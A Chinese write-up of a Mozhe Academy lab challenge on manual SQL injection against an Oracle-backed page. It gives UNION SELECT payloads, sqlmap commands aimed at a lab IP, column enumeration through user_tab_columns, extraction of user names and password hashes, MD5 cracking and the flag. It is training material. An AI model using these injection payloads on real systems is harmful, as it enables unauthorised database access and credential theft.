墨者学院 手工注入题解(oracle数据库)

简介

Oracle 数据库系统,是美国ORACLE公司(甲⻣⽂)提供的以分布式数据库为核⼼的⼀组软件 产品。是⽬前世界上使⽤最为⼴泛的,数据库管理系统。

以下是手工注入的流程:

1、判断注入点

使用 and 1=1 进行拼接

2、确定字段数

使用语句 order by

最终确定为只有两个字段

3、确定返回点

使用语句 ?id=-1 union select 'null','null' from dual

4、确定数据库名称

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 --current-db 查看当前数据库

5、确定数据库中的表名

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 -D SYSTEM --tables

6、查询列名

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual 进行模糊搜索

确定第一列为 user_name

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual 进行模糊搜索

确定第二列为 user_pwd

7、获取账号以及密码

使用语句 new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

确定zhong 的密码为 1c63129ae9asc60asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

确定 hu 的密码为 1c63129ae9db9g20asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

确定 mozhe 的密码为 48b58ef8be01ef64e7de3f764ec83d2d

8、使用MD5进行密码解密

最终确定 mozhe 的密码为 267581

9、登录后台

10、提交KEY

KEY:mozhe89c06b9c5a5b67c98c500a1ce66

安全

网络安全靠人民,网络安全为人民

相关推荐
mghio7 小时前
Dubbo 中的集群容错
java·微服务·dubbo
咖啡教室12 小时前
java日常开发笔记和开发问题记录
java
咖啡教室12 小时前
java练习项目记录笔记
java
鱼樱前端13 小时前
maven的基础安装和使用--mac/window版本
java·后端
RainbowSea13 小时前
6. RabbitMQ 死信队列的详细操作编写
java·消息队列·rabbitmq
RainbowSea14 小时前
5. RabbitMQ 消息队列中 Exchanges(交换机) 的详细说明
java·消息队列·rabbitmq
数据智能老司机15 小时前
CockroachDB权威指南——CockroachDB SQL
数据库·分布式·架构
数据智能老司机15 小时前
CockroachDB权威指南——开始使用
数据库·分布式·架构
李少兄15 小时前
Unirest:优雅的Java HTTP客户端库
java·开发语言·http